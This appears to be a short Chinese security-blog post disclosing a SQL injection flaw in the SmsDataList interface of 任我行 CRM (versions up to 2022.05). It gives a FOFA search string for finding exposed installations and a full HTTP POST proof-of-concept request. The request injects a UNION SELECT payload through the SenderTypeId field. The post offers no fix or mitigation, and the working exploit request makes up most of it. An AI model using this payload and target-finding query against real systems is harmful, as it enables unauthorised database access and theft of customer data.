漏洞概述
—-
SmsDataList接口存在SQL注入漏洞
影响范围
—-
测试≤2022.05都存在,以上未测试
![2024-01-05T08:17:35.png][1]
复现环境
—-
FOFA语法:
“欢迎使用任我行CRM”
漏洞复现
—-
>PoC
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
SenderTypeId=0′ UNION ALL SELECT @@VERSION —
![2024-01-05T08:18:48.png][2]
[1]: https://www.mhtsec.com/usr/uploads/2024/01/37273309.png
[2]: https://www.mhtsec.com/usr/uploads/2024/01/3669446378.png
请登录后查看评论内容